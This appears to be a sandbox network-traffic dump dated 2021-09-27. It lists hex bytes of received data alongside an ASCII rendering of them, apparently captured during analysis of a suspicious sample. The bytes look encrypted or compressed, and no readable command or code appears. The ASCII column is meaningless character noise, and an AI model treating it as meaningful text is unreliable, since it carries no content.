                                                                    2021-09-27 12:27:48 UTC153INData Raw: ce 20 61 28 35 25 d3 e0 68 f4 43 3b d3 71 3d 5a ea 13 72 34 1b 55 70 d2 7e 42 fe a2 ee 89 2c 47 ba b6 f5 e5 97 14 ea 9f 51 18 1b 6f 46 d1 dd e4 dd 52 3e b2 d1 70 60 02 02 36 b3 c7 96 bd 11 c5 39 58 78 0c 54 3d 2d 7e b1 4a bd 41 01 17 92 85 6c 9d 85 19 03 0e 9d fb 5f 1c 6e 5c ee 8a 17 6d d4 c6 25 9a a0 89 f4 2a 6a 34 e1 ae d4 f9 0c 05 34 61 08 d6 54 2e b6 55 62 00 58 71 79 35 56 a0 94 5f b5 f4 2d 11 dd c1 3e c3 59 d7 50 fd 95 4a 8e 13 c4 8d 7c 22 36 fc 3a a9 b9 7c 8d d5 26 d0 d7 af ff 2a 21 eb bb 62 0e 46 16 c9 d4 78 f0 07 08 eb 6c 2a 9e 37 36 b8 9a 73 c4 55 b0 52 08 a1 8f c4 7d 7d de 96 5e a7 91 78 90 a6 12 ee e9 53 88 16 b9 7c 80 7f dd f4 91 b7 3d b6 05 93 3b 2a bb 8f 69 fc e8 8e 6e 0a 5a fc 22 18 e4 79 40 b0 2f 8b b9 c5 f2 f4 9e 24 fa ae 5e be 82 04 a5
                                                                    Data Ascii: a(5%hC;q=Zr4Up~B,GQoFR>p`69XxT=-~JAl_n\m%*j44aT.UbXqy5V_->YPJ|"6:|&*!bFxl*76sUR}}^xS|=;*inZ"y@/$^
                                                                    2021-09-27 12:27:48 UTC155INData Raw: e4 d3 e6 30 b2 52 53 4d 87 19 4b 4a d1 7c 6f 4e 56 c9 bd d3 75 93 db d3 43 72 33 65 13 14 2a bc 6a cb 01 d9 58 05 83 ee 77 e3 16 52 85 4c 13 aa a5 c7 95 0d 0a b5 58 cb e1 5e 5a 17 51 4a e8 a2 d3 a7 f8 9e fd 2a c9 e6 a0 33 c4 cd 43 9f b6 42 56 22 d9 5d 9f 64 f5 74 64 97 3d 5d 17 75 ec 17 a1 d1 9d e4 b5 d4 38 34 46 9a d7 e5 57 d8 99 44 3b b1 2e ed 67 98 c5 d9 77 06 b3 e8 cd ce d3 d1 92 22 26 50 04 84 80 cb 5b d6 ad 44 c3 34 f4 cb 32 b7 5c ed 2f a8 b2 7c 89 ac 03 df d5 97 65 e2 82 d4 28 94 40 51 85 4f ab ab ad 8f b4 e4 da 5a 25 ad a0 9a 1e a6 fd 11 93 3e 88 06 6a f6 21 7c 63 de 2d d1 35 be a9 dc c5 0b d9 9e 6f 4f b1 a9 c0 9e b0 82 43 48 67 84 00 ae ec 5e 0b f0 47 7a e8 b3 61 b2 cd ad 6f 76 9e 51 d1 06 2c 47 51 95 f8 68 50 f2 2d 1c 04 4e 94 a8 4e cb 73 2d c3
                                                                    Data Ascii: 0RSMKJ|oNVuCr3e*jXwRLX^ZQJ*3CBV"]dtd=]u84FWD;.gw"&P[D42\/|e(@QOZ%>j!|c-5oOCHg^GzaovQ,GQhP-NNs-
                                                                    2021-09-27 12:27:48 UTC156INData Raw: 02 1a 90 e6 6a 9a 76 eb 62 01 97 f6 ff bf 17 79 bd e6 4d e6 72 69 fe 09 07 c3 e8 5f 3f ea 38 ed da 50 b2 53 74 6f 97 cf a1 2c 5a 5f 4e b8 2f 49 01 f3 9e 2e 2b 15 1c 4d 7b 1c aa 1c 1f 39 90 d5 e4 c2 f1 23 e1 f7 c5 15 c7 6e 91 0a b9 c0 ec e4 4d 6f 53 ef 88 a1 41 dc ec f5 2a 9f a1 a8 3b 18 45 ea 34 7a e0 3c 12 73 0a d6 77 d0 57 f2 49 f6 5f 6a 29 7e 89 b3 c1 85 6d 8f bb ec 09 3e 77 2b b3 77 ec 25 67 c9 32 84 11 00 92 ae a6 c4 45 dc 2e 4d 69 d4 e2 1d a4 ae 7b 8a ef c9 37 5c b3 cd d5 d3 52 17 b0 57 62 a5 79 cc d4 b7 2e 86 c8 9a 90 60 9c 61 3f 03 80 19 85 c1 a4 e6 56 ff 13 17 ce 35 95 5e 33 05 0c 84 48 26 9e ed 25 42 b8 b5 a2 2f e6 d9 75 f1 e4 34 0c dc e5 38 99 70 01 55 66 e6 bb 6e cc ab d4 db 24 b2 f9 ed f9 54 94 e3 95 cc 24 25 71 3c 10 fa fc 29 2a 82 12 ea c4
                                                                    Data Ascii: jvbyMri_?8PSto,Z_N/I.+M{9#nMoSA*;E4z<swWI_j)~m>w+w%g2E.Mi{7\RWby.`a?V5^3H&%B/u48pUfn$T$%q<)*
                                                                    2021-09-27 12:27:48 UTC157INData Raw: a3 48 93 0b de e3 a4 82 96 73 3d 91 5e fa 9b 68 89 e1 d2 49 c2 e5 a4 d8 b1 8d 09 ed 92 25 64 3b 02 e2 98 3f 24 04 25 24 f5 59 39 bd f3 84 86 a3 31 65 a4 a2 1d 36 bc d1 76 3c 7e 36 00 f7 92 9a b7 1f da 5b 0d 64 7e 31 49 53 1f c8 7b ae 09 5d 55 b9 fa 10 e6 ee 53 4f 5d c8 a2 16 49 2d 32 9e f0 70 0d 93 9f 6e d0 00 01 5a 86 ca 90 5c 1c 69 1b f1 de e8 ef f5 17 83 f6 52 93 c2 8c 9b bf ab e0 83 51 67 8a 60 72 8c a8 6e 6e 83 09 ae 2e 83 30 69 cc 0b ca 01 70 ad f9 e7 1d cb 4e 45 b0 14 57 ac 1c 51 41 2c e1 8a 6f 2c d3 a6 df f0 2f 76 cd 03 0a 11 db 74 19 b2 30 21 8e 89 40 fe 66 d1 0c 42 a9 87 b8 22 37 ba d6 3f db d6 1c d6 d0 67 84 8d 4f 96 44 be 36 c6 23 9e b4 d6 f8 70 f2 6a da 7b 76 ea d4 3e a8 5c 69 93 b3 b9 0b c0 f8 19 91 87 23 bc 0c 2b 7c 7a 6f 15 a1 7d 33 dc 2c
                                                                    Data Ascii: Hs=^hI%d;?$%$Y91e6v<~6[d~1IS{]USO]I-2pnZ\iRQg`rnn.0ipNEWQA,o,/vt0!@fB"7?gOD6#pj{v>\i#+|zo}3,
                                                                    2021-09-27 12:27:48 UTC159INData Raw: fa 28 18 6b 5a 60 db 3b c2 b1 ea 26 f6 d3 da 25 88 9a 9e af 55 4e 60 df 20 3b d6 54 78 26 63 5a 07 39 c6 5c c8 04 a0 1e 52 cb b1 3a a8 4d 69 fc 19 30 fd d2 a5 e8 4c 53 fa 5d 98 aa 01 08 70 18 5e 82 e6 88 e2 a7 f5 b9 60 98 fc dd 6a f2 95 f1 4c 50 a7 a1 a8 33 d5 63 a1 1e 86 f4 14 db c9 cf d3 23 b9 64 75 71 6d 22 56 89 f6 a8 0e 4e 25 88 3d 29 8e d5 0b fa 12 95 77 05 04 b7 d4 2d 3a 3e 3b 47 5d 0d da a4 ac db 5d 13 48 d0 3d 71 f7 3a de 68 29 dd 46 14 c0 c9 49 57 12 36 3a 15 12 03 90 0d bb dd 82 74 d7 a5 90 e3 07 f1 f3 40 35 c1 8f 0d f1 5d e0 93 a1 55 d7 82 5a d2 69 ca 4b 45 ad 69 4c 55 ec 37 86 18 f3 9c 87 fb 50 8d cd b7 97 3b 7b 43 3e 43 5c 8e 92 97 1d 97 21 69 cd c3 6e f7 ec 08 55 bd 2a 34 72 a9 a0 56 a4 14 cd db ab b4 20 32 96 e6 04 d3 ec d5 a3 68 5b d1 36
                                                                    Data Ascii: (kZ`;&%UN` ;Tx&cZ9\R:Mi0LS]p^`jLP3c#duqm"VN%=)w-:>;G]]H=q:h)FIW6:t@5]UZiKEiLU7P;{C>C\!inU*4rV 2h[6
                                                                    2021-09-27 12:27:48 UTC160INData Raw: d2 b6 c4 4e 44 c0 8e 0a c9 2a ea 05 47 c1 ba b6 d4 50 08 cc 85 23 9b 39 42 c4 3a 3f f5 ee 65 06 c0 47 ef cb 50 8a 1f 22 2e db 8b de 73 0a 25 2e f3 7a 0b 5a a8 e0 47 92 97 b3 ef c8 bd 31 b8 99 a8 20 2e 0c 0e 3c ef 31 26 0c cd 1a ab 5d c6 7f 0d 35 34 ce a7 9e 26 7d 4e a8 2f 12 44 f5 6b 49 0d 87 c2 82 2a e4 e1 70 92 b9 f6 e0 2c ea 58 da 77 d1 79 cf d1 ab f0 67 08 45 09 f2 66 47 0d d9 db e3 7f e1 29 8b 6a 2c bd 39 80 1f 14 ac d8 ef 92 02 87 72 19 0a bd fb 5a f1 e4 35 c4 ae 89 7e 05 ea ae d0 ca 13 6a f3 16 0a 9d 36 a8 b9 f2 6b 8a c9 fc fb 1c e1 70 9c df 56 c8 1c 59 0f 5d e9 43 b6 dd 20 fe 5e 93 c6 d1 d8 33 dd ec 50 3c c5 90 63 6b 66 b8 63 2e f9 3a 12 da da 3f 61 8b 53 81 d7 ab e9 72 2b 80 03 66 03 07 e6 26 29 0d 2e b5 79 13 48 05 ff fc c0 b1 8f 5c 65 a1 d8 7d
                                                                    Data Ascii: ND*GP#9B:?eGP".s%.zZG1 .<1&]54&}N/DkI*p,XwygEfG)j,9rZ5~j6kpVY]C ^3P<ckfc.:?aSr+f&).yH\e}
                                                                    2021-09-27 12:27:48 UTC161INData Raw: 74 5d 5d d5 29 a0 73 89 92 d5 ca ce 2a 51 9f 0e b0 c5 2e c1 a5 ae 0b a5 81 c0 ad e3 c1 10 ad 30 cb 98 ac a3 54 54 b9 e4 b4 b0 da 0b a1 a6 42 52 40 68 4f cc d4 16 7b e0 dc 5d 4d dd ce 95 8a 8b 16 40 4d 7c 98 52 b5 df ba ac c6 bb d3 da 03 fb 56 8f de db 30 04 e6 57 54 8d 8b 90 03 75 d8 dd 89 af 02 70 fb 9e 39 3b c0 31 50 64 03 c3 c1 dd 1d 48 11 1a bf 98 be f2 b4 46 8b fc 19 9d 87 f7 ad ce 9a dd ad 66 7b a0 01 0e cb ae 62 74 8a 13 ae 68 bf 32 72 97 54 da 55 60 a0 b5 ea 3e c0 f7 b0 44 a1 e7 0c e1 e4 e3 94 02 1d 99 f1 16 73 11 7b a7 b2 58 dd c0 c3 08 aa dc 78 eb f5 73 42 a4 05 85 67 ba fd 55 7d 12 c0 cf 66 27 ee 09 17 dc 37 05 ae 1a 5d df 1e 8c 50 b3 53 e3 4c 55 1c 50 c3 58 eb 6b c0 d6 41 64 9f 1f 07 7f 84 81 e0 48 96 ac 48 cc e3 77 f1 52 6d 04 38 33 5d fa 25
                                                                    Data Ascii: t]])s*Q.0TTBR@hO{]M@M|RV0WTup9;1PdHFf{bth2rTU`>Ds{XxsBgU}f'7]PSLUPXkAdHHwRm83]%
                                                                    2021-09-27 12:27:48 UTC162INData Raw: 08 db fb 8e 41 52 16 7d 3b 80 6a b7 d2 f4 61 b1 89 a6 3a 17 8d 1f a9 59 41 cc f8 7c 3c d2 5d 07 26 0c 0a 09 35 5f 5a ac 1d bf 28 d1 c8 76 39 a6 5c d5 d9 d5 6e e6 f3 87 f3 32 72 f7 4d 2c af 55 16 66 2c 8c a8 b2 91 dc 9d f3 ab 41 be d2 f9 20 c5 f0 46 b1 99 bc 7c b6 ea 00 a5 04 cd c4 38 d4 16 41 56 ef b6 3f 86 ad 9d b7 f7 82 19 4b 76 16 8c c2 4d 3f ef 77 2f b6 3b da 4c 8d f0 f4 50 64 d7 ef c4 c7 ab 98 ed e6 50 5e 73 31 d6 13 21 c5 c5 c1 93 5e f9 af 51 cb 1f 88 5a c1 d1 aa 3e 40 8c 3d 48 2b be 86 5a 1e e6 54 80 7a 76 89 75 5b 7d f0 6a 3f 06 5c cb f7 32 03 ed 40 6b 4f 08 95 38 93 ac e0 94 d8 a6 32 bd 89 a3 05 68 7e 6b f1 55 36 b4 af 4d b2 04 5f 13 7b 80 4d 81 06 8f d0 66 96 f4 52 c5 b7 4e ed cb 72 69 9e d9 3e 16 dd 41 3b 9d fc e4 55 48 ff dc 53 92 8c 85 37 2a
                                                                    Data Ascii: AR};ja:YA|<]&5_Z(v9\n2rM,Uf,A F|8AV?KvM?w/;LPdP^s1!^QZ>@=H+ZTzvu[}j?\2@kO82h~kU6M_{MfRNri>A;UHS7*
                                                                    2021-09-27 12:27:48 UTC164INData Raw: cd f2 68 85 ff fd 46 46 d7 bf 19 c3 3b ba 32 24 d8 a2 bc f5 46 29 f4 b3 06 be 37 7d ed 1f 1d df f1 5a 22 f2 70 c0 ff 72 93 0e 17 53 ea cc ee 50 32 33 1d df 4b 37 68 8d e8 30 58 4f 68 40 0b 5a f9 1f 67 43 ef ec fa d3 ec 39 fc 83 c4 2c ed 03 95 1c be d0 e0 6e 59 54 45 e5 9b eb 4f be f8 e9 34 87 a5 be 67 26 76 cb 50 5f 82 04 55 1d 44 9c 59 25 7b d3 6f c5 77 3e 11 28 b7 a9 f9 b4 4c 74 9d ce 0a 91 49 bb 74 3c 01 ec ba 23 f3 3b d0 cb 13 d3 71 43 97 85 f0 85 91 26 11 9c 48 59 9a 74 0e 61 cf 3a 4f 00 1a 07 87 af 47 b5 ab 18 ab 46 00 de cd 60 38 65 79 bf 61 90 ce f8 76 b7 38 aa 4c 1c a4 05 f5 17 57 b8 0e 47 bf e4 84 c4 96 b4 1f 78 b1 80 35 3d 3d 73 3b 0f fe 98 52 bf a6 44 57 77 07 f0 80 76 95 61 5d 43 7a 0c 5d 67 94 5c 51 44 53 c9 28 37 0a f1 ae a2 ff 93 a4 eb 5d
                                                                    Data Ascii: hFF;2$F)7}Z"prSP23K7h0XOh@ZgC9,nYTEO4g&vP_UDY%{ow>(LtIt<#;qC&HYta:OGF`8eyav8LWGx5==s;RDWwva]Cz]g\QDS(7]
                                                                    2021-09-27 12:27:48 UTC165INData Raw: a6 2c da 23 7f 6c f6 00 cc 28 ab 81 f6 f8 e9 09 73 ea 30 95 ef 68 ff bc a3 02 a6 18 d4 a1 f4 c2 64 d2 e6 43 08 4c 3f c5 e5 50 0a 52 55 4e e9 61 20 ff a7 57 91 a3 24 29 fe d5 18 31 a8 cd 62 c4 75 65 46 88 1c ff b7 6b 92 3a 94 64 62 3b 6d 22 a3 6a 08 95 27 64 73 b6 fc 49 f3 ff 79 0d 68 e1 97 3a 73 2c 24 9a f5 66 1b 3f bf 5e e2 ce f6 d8 5d 06 4b 83 c3 71 95 39 10 34 74 fb c0 5b 39 99 58 51 0b 44 65 7d 25 87 93 9d 56 b2 f9 e8 0b 86 80 69 f0 16 d6 67 d8 88 73 aa 39 d5 85 10 87 7f da 6a bc fa d9 a3 ff 5c fc a4 b4 bc 10 01 d9 b2 45 21 43 31 fc c6 4b e3 9c ab 4c ec 89 20 a9 92 2a 3a de f0 ff 24 c1 bc 2b 45 3a 99 a5 23 42 53 60 44 a3 64 63 b6 2b 38 b2 6a f6 be 87 79 9f 62 b2 0f 55 e3 53 b1 f9 d1 d3 65 7a d3 8f 8d 7d ad bb b5 c1 ec a2 4e c2 a9 f7 f2 49 6d 04 31 35
                                                                    Data Ascii: ,#l(s0hdCL?PRUNa W$)1bueFk:db;m"j'dsIyh:s,$f?^]Kq94t[9XQDe}%Vigs9j\E!C1KL *:$+E:#BS`Ddc+8jybUSez}NIm15
                                                                    2021-09-27 12:27:48 UTC166INData Raw: d2 06 c1 ca a9 a6 3d 77 47 d4 05 45 33 d8 a4 10 84 77 84 05 a6 29 8f d0 59 c1 5e 86 1e b7 82 23 d3 9a 49 7a f2 91 0e f2 fb 26 52 48 be ef 6b 9e 30 f2 ad 9b 6f af 82 99 fb 34 ba 86 d2 34 ef 8a b2 d5 b5 38 76 eb 45 e3 52 20 d1 5b d8 d8 c1 fd dc 3e 4e bf 10 a1 b5 5e 5e 2a f0 7b 1e 62 67 87 df 28 d1 d1 23 16 a9 43 24 41 a6 eb 35 a3 87 de 29 79 d0 e4 cd 40 c4 c2 75 21 a3 36 fc 7f 98 ab f3 ba 1e cc 91 b2 c0 bb a9 e5 20 38 51 87 a2 f2 bc 2f cc d5 2d b0 5c 9e a0 1a c8 3a 8a 3d ce c2 8b 15 42 eb 32 b1 21 9e 29 d0 11 eb 47 85 d5 11 86 8b 54 60 5f 0d 30 04 a0 e3 5e 86 13 96 3a 26 28 52 9a 98 9f f1 cf 9a cd 06 3b 93 7a f8 02 c8 55 75 a1 01 31 a4 e5 6e 0f 62 4c 00 49 91 8b 80 07 9c 36 74 c3 5b 59 d6 ea 6c 3a bf 73 7a 33 fe f8 7e ce 78 99 b4 cf d2 40 71 e8 c2 60 cd 87
                                                                    Data Ascii: =wGE3w)Y^#Iz&RHk0o448vER [>N^^*{bg(#C$A5)y@u!6 8Q/-\:=B2!)GT`_0^:&(R;zUu1nbLI6t[Yl:sz3~x@q`
                                                                    2021-09-27 12:27:48 UTC167INData Raw: 92 63 48 bf 6c c0 f5 fd e0 4e 60 d7 bc 19 c6 2c ba 40 57 5f a2 bf e8 06 07 f4 bb 06 bb 20 7d f6 16 72 dc f2 47 91 dc 70 cf ff 72 83 1e 88 03 6b be ec 4d fa 1e 1d ce 4b 3d 7f 8d b9 45 bf 4d 6b 31 c9 4c f9 66 67 4e ff ec 88 c9 03 3a ff f2 8e 3e ed 7a 95 1e ae d0 31 f0 de 54 46 e4 e1 87 4f c7 f8 eb 25 87 77 e8 e6 26 75 d6 84 37 82 7d 55 1f 52 9c 2b f5 38 d7 6c d8 bb 59 11 54 b7 ab ef b4 24 a4 1c ce 09 18 0f c1 74 ba 01 ee ad 23 81 48 56 cf 10 4a a3 3f 97 15 f0 87 87 26 63 f5 d6 5d 99 69 16 1c cf ae 4f 0b 0a 07 87 d7 c0 b5 a8 69 65 22 00 41 cd 63 28 65 0b a5 1e 95 cd f9 50 d9 38 35 4c 1e b4 05 ee 8f 2e bd 0d de 29 b1 84 5b 96 b6 0f 78 2e d0 4a 38 3e ea 09 56 fe 3b 52 bc b1 44 c8 a4 e0 f2 83 ef ff 3a 5d e4 7a 09 4b 77 e6 5d 90 41 50 d4 54 6b 0a 5a ae a7 e8 93
                                                                    Data Ascii: cHlN`,@W_ }rGprkMK=EMk1LfgN:>z1TFO%w&u7}UR+8lYT$t#HVJ?&c]iOie"Ac(eP85L.)[x.J8>V;RD:]zKw]APTkZ
                                                                    2021-09-27 12:27:48 UTC169INData Raw: b4 32 8d 6a 30 f8 51 e6 f0 f4 11 cc 5a bb a5 86 e8 01 13 53 fa a6 0f ef 1a fe 8e b0 13 d4 86 d1 bc d5 d3 04 0f e1 50 0a 5d 29 86 a0 5a 47 48 76 3c 5c 76 22 ee a7 b8 82 ab 1d 1d ed 94 38 21 52 50 62 36 63 75 52 de ee 8c 8a 5c b3 6c 2c f1 65 02 6f 74 32 f5 7b ad a3 7c 50 c4 75 92 f1 e9 79 78 6d e9 ae 09 b3 03 10 8a 6f e0 1b a0 bc 4e e6 d0 e8 97 03 17 6d 95 27 28 96 29 12 22 72 2a 19 42 72 8e 7c 42 27 c5 67 6b 25 56 94 86 8f ad 39 3a 28 95 22 ee f0 47 d1 5e dc 99 01 b0 f0 e4 a3 41 43 9f db 25 be ab 58 b8 8a 12 45 ac 80 ce e5 80 db b4 55 3a 42 22 8c e6 89 95 b9 92 ee 5c 89 3b ae ab 2e 19 c5 68 30 19 e7 9d 6f 80 3d a0 a7 02 44 82 7a 7a 1a 4b 57 c4 de bc b0 6c f0 1f 87 6a 86 33 f0 79 70 c9 5d e7 79 ca 54 4f 65 a5 7d 13 b6 89 91 e4 41 9e a3 5e 40 f8 66 c9 3c 7c
                                                                    Data Ascii: 2j0QZSP])ZGHv<\v"8!RPb6cuR\l,eot2{|PuyxmoNm'()"r*Br|B'gk%V9:("G^AC%XEU:B"\;.h0o=DzzKWlj3yp]yTOe}A^@f<|
                                                                    2021-09-27 12:27:48 UTC170INData Raw: 97 c2 bd 78 74 f0 ce 8a f0 bd 6c 53 16 7f 04 43 56 8f d2 8f b8 82 a4 a0 3a 9e 86 10 b0 af 50 17 e1 82 f4 d4 5d 6a 2c 61 0e 14 32 ee 61 f8 19 5d e5 48 c8 b0 23 bf 5c 3e f8 5b 5e d6 f3 21 1e 52 5c ed 4d 82 83 ec 2f 8c 3d 4c b5 ee 70 d3 9c fb 8e 52 be db fd 9d f8 ba 68 ff 4b 7d 7c 70 f0 19 a5 9e c8 af 2e f8 16 78 94 29 ac 31 86 96 bd ae e5 64 1b 20 7f 5c 43 cc 4d c6 c4 66 3a 99 3f e7 68 b2 d9 8e 87 3d cd 91 c0 d2 ab be f8 d0 5b 7a 73 8d 2a bc 34 cb c5 3c b1 3b e8 51 40 e0 3b 2e 95 cf d1 94 14 51 99 41 49 d9 9d 03 4f c0 3d 45 94 d5 63 94 75 e8 70 bf 7d 1b 06 18 39 58 27 15 ed 36 70 37 21 ad 29 93 a7 a3 5d ca a6 1d 95 69 8a eb 77 83 62 8b 73 20 6b e7 68 0f 10 5e 13 cd 93 7b 8a 2a 8f f9 92 c3 c4 58 c5 e6 6a 28 cf 84 78 06 f8 c0 ee cf 41 9b b2 dc c9 5c 4f 31 c6
                                                                    Data Ascii: xtlSCV:P]j,a2a]H#\>[^!R\M/=LpRhK}|p.x)1d \CMf:?h=[zs*4<;Q@;.QAIO=Ecup}9X'6p7!)]iwbs kh^{*Xj(xA\O1
                                                                    2021-09-27 12:27:48 UTC171INData Raw: ea 03 63 4e 4b 49 cd 6d 69 f1 f6 9b 6b b4 ca 84 19 d6 05 bb 32 56 d9 a4 b4 7f 6b d1 e9 83 06 a7 09 7c ed 11 1d d9 f9 60 09 04 6d f6 ff 22 ad 1f 17 02 ed b8 e7 71 19 c8 00 f7 4b 61 56 8c e8 42 59 49 60 60 22 93 e4 5c 67 de d1 ed fa c8 eb 3f f4 97 ed ed f0 40 95 82 80 d1 e0 f1 58 52 4d 0b 93 8c 4b fc f8 3b 0b 86 a5 ef 60 20 7e df 5b e7 83 46 55 c3 7b 9d 59 f4 7a d5 67 96 7b 01 15 68 b7 bb b9 b5 4c a6 9a c8 02 7a 47 52 69 86 01 f2 fb 22 f3 49 d1 cd 1b 6c 7e 46 96 28 f0 d7 d1 27 11 f4 4a 5f 92 5e 03 ed cf 93 4f 57 5b 06 87 dd 46 b3 a3 97 a7 3e 01 7f cd f3 79 64 79 a4 66 96 c6 e8 7b 74 3b 0b 4c 82 e5 04 f5 88 56 be 06 ce 97 cd 85 64 96 66 5e 79 b1 d1 32 3b 35 cd 13 af fe 04 52 60 e7 45 57 a6 06 f6 88 7e 91 98 5a a4 7a 19 1c 76 94 5c 5b 42 5b 49 2e f3 07 1a ae
                                                                    Data Ascii: cNKImik2Vk|`m"qKaVBYI``"\g?@XRMK;` ~[FU{Yzg{hLzGRi"Il~F('J_^OW[F>ydyf{t;LVdf^y2;5R`EW~Zzv\[B[I.
                                                                    2021-09-27 12:27:48 UTC173INData Raw: ed 7a 7d b5 40 8c a4 3b c2 6a 5b ba f4 46 cc ee 88 a5 f4 e9 e9 18 68 c1 17 97 ef 4d fe 72 d0 12 a6 87 d5 a4 f6 a1 65 ec e2 07 0a 81 4c 87 f1 5d 08 45 4d 07 cd 47 22 b9 a7 54 f7 b2 26 38 fe d2 11 0e a3 f9 66 61 63 59 30 df 9c 8d b6 16 92 94 1f 5a 61 55 6f c0 01 f5 09 ac 25 74 6b ff d8 11 f1 be 79 78 6b f1 95 ac 73 15 13 f8 f6 c8 3b f7 bc 4e e0 d8 f6 01 4a 00 69 e7 c2 62 9e 72 12 22 74 22 d7 cb 3b 99 78 30 0e bc 47 30 25 e2 b0 8e 54 a4 f9 3c 14 ae a7 6c f0 27 d1 36 ae 98 73 b1 3e e6 87 33 06 1e fa 45 be 33 2c b9 f8 13 fe a3 a4 bc 10 30 fa d4 55 02 32 23 fe e7 4b 90 9d e0 4f fe a8 5b ae 13 5e 18 de 6f fe 1c c3 ef 2a 53 1c c0 a7 5a 35 83 61 7d a1 44 73 b6 2b 73 91 0d f0 c7 f6 6b 9d 34 32 7b 54 bb 5c 9f 58 ab d4 4f 74 85 0f 12 7c c1 b2 96 40 1e 82 3c c0 5c 0e
                                                                    Data Ascii: z}@;j[FhMreL]EMG"T&8facY0ZaUo%tkyxks;NJibr"t";x0G0%T<l'6s>3E3,0U2#KO[^o*SZ5a}Ds+sk42{T\XOt|@<\
                                                                    2021-09-27 12:27:48 UTC174INData Raw: b5 5e 8b 94 32 bd 52 eb c1 ee 88 8b bd e4 82 17 26 13 b3 56 a5 83 a0 97 80 df a0 56 4e 87 d9 b3 5f 57 3d 93 03 78 fc 26 6a a8 b6 0f 0f 35 d8 61 ca 58 9c ae 48 b3 b0 97 8e 5c 4c f9 02 4d e4 c8 bc c3 52 27 ed dd 54 82 35 38 7c 2a 6e b7 ce f6 d2 e7 fb 4a 84 bf c8 f9 6d ef 98 66 ab 59 7d 07 70 20 cf a4 44 d1 5f 39 da a8 2b 26 01 d7 31 82 43 bc b5 e2 84 1f 02 b8 fb e3 e4 36 c6 d4 b3 3b a4 3b fe 78 80 e2 d7 90 3d b6 91 08 09 aa ab e3 20 4b 50 01 80 17 94 4f cb 75 e6 b0 5c ec a1 50 ca 49 8b d3 c5 aa 94 a0 60 99 33 48 02 99 31 74 35 f5 45 ef d5 93 4e 74 77 71 5f 79 31 74 85 c1 71 5c 15 7d f5 71 a8 20 9b 3e b1 9f 40 c6 e3 dd 1d 51 aa 8b 03 68 73 75 a9 32 3f f9 ce 13 0f c0 9d 12 56 97 8b 9d 08 4b 04 5c c2 bf 58 c1 24 6b 3a ee 74 6f 24 37 d5 94 cc 3a 9b a2 1e c8 47
                                                                    Data Ascii: ^2R&VVN_W=x&j5aXH\LMR'T58|*nJmfY}p D_9+&1C6;;x= KPOu\PI`3H1t5ENtwq_y1tq\}q >@Qhsu2?VK\X$k:to$7:G
                                                                    2021-09-27 12:27:48 UTC175INData Raw: 30 35 5e 7d 34 76 89 93 4a b0 6d df 09 ff e0 46 47 41 bc 7e c2 dc b8 4f 56 0b 5c bd e8 46 2c 62 bb ee a4 d0 7f 90 11 f3 21 f0 47 22 f7 e6 cf 64 76 74 1c 6a 02 e4 41 ee 4d 32 35 8b ce 59 1c 8f 8f 95 42 7d b0 69 31 09 60 6f 66 a2 4a 08 ee 87 c8 d4 c6 fd f2 c6 10 7b 7a dc 3f 59 d2 9d f1 03 ab 44 e4 99 a9 d9 c7 17 ef d2 85 d8 ef 16 d9 77 d6 50 19 14 7d 26 3e a2 9e 24 f4 e8 2c 6e d8 77 76 87 54 ae ae 1f b6 31 a6 37 31 0b 18 4b f1 e2 ba 92 cb 5d 21 8e 49 18 34 12 4a 73 0f 01 15 ba 82 77 24 6c f4 ae a6 9b 69 0e 2d 59 ae 81 20 fd 05 fa dd b9 4a aa 69 a9 10 96 41 b9 66 df 67 04 a4 7c 90 cc f9 74 ec ae 35 98 2e 43 07 88 88 63 b8 0c de bd 84 12 5b 08 b3 f8 7a cc d1 62 3d 3f ea 39 6f 68 3b ac 8c 41 46 2a a6 6d f0 82 ef 97 01 cb e4 ac 0c bb 75 e9 5c dd 44 51 d4 28 57
                                                                    Data Ascii: 05^}4vJmFGA~OV\F,b!G"dvtjAM25YB}i1`ofJ{z?YDwP}&>$,nwvT171K]!I4Jsw$li-Y JiAfg|t5.Cc[zb=?9oh;AF*mu\DQ(W
                                                                    2021-09-27 12:27:48 UTC176INData Raw: bf 10 85 f4 3d ea b6 3d 8c 17 35 d8 51 7e 7a 62 11 3d 4f 4c a7 89 e9 27 16 72 fa 32 84 79 1a bd 8d 47 11 db 87 3f ba f4 d3 64 83 77 50 fe 4b d9 84 8c 5d 0e 4a 57 3c e8 54 b4 ee d0 bb 62 b1 5b 38 dc 9d 19 21 aa dc f4 36 52 62 a2 dc e1 8d 8b 5b 92 6c 14 7f f3 02 ce 77 c5 f7 74 ac 7c 7b 71 c4 fd 02 67 e9 22 6f 8d f3 e8 2c 06 0a 31 8a f7 70 8d a0 77 4d 06 da 8b 81 db 1f 4b 95 c3 b8 00 29 c9 35 92 20 aa 4b 96 86 5a 42 0f 54 f1 6b 30 52 74 8c 29 a4 36 33 0e 95 82 7f 66 47 0d 47 3c 9b 0e b1 cf e9 85 41 07 0d 4d 25 81 af bf ba 85 13 ed a8 a6 ce 11 12 4d b4 42 21 a2 20 83 e7 7f 9b 9f 92 4e cf 1f 3b c7 af ce 1b a3 6f a8 17 c1 9d 2b 14 ab a0 4d 1d a4 80 1c 7d d9 4f 71 c4 2a 28 26 6c 6d 1b 67 68 e0 34 a8 77 56 c9 5d e7 ef ca c0 6e 92 87 72 12 c7 8d b7 e4 41 9e 35 5e
                                                                    Data Ascii: ==5Q~zb=OL'r2yG?dwPK]JW<Tb[8!6Rb[lwt|{qg"o,1pwMK)5 KZBTk0Rt)63fGG<AM%MB! N;o+M}Oq*(&lmgh4wV]nrA5^
                                                                    2021-09-27 12:27:48 UTC178INData Raw: fe b3 a3 92 5d f6 94 80 b8 50 74 c0 08 1c f0 14 6d a6 14 5b 13 67 53 a7 d2 a7 71 14 a4 f6 3d 6b 84 a4 b3 a9 55 3f e1 02 38 42 5d 91 2d 94 0c 72 35 c0 65 d0 19 b9 28 de c8 67 24 4a 5e 31 f9 38 5e fe f3 99 d0 c4 5c 9a 4f 77 81 48 38 20 39 64 b5 d2 bf 45 9c fe 84 a7 bc b5 f9 13 fc 92 68 b7 99 eb 7c d4 f2 ec a7 39 d1 ff 2a d0 16 00 40 bf ac 79 92 63 bf c8 e2 46 0c 08 7f d0 96 5a 4d 08 c6 93 38 d9 3b 1a 6b 9a d9 f2 50 ab cd 01 d4 27 a9 d6 e3 26 5c 52 73 81 f3 2a 34 d7 c6 c9 b3 21 ec 89 47 c8 3b 8a 4f 59
                                                                    Data Ascii: ]Ptm[gSq=kU?8B]-r5e(g$J^18^\OwH8 9dEh|9*@ycFZM8;kP'&\Rs*4!G;OY
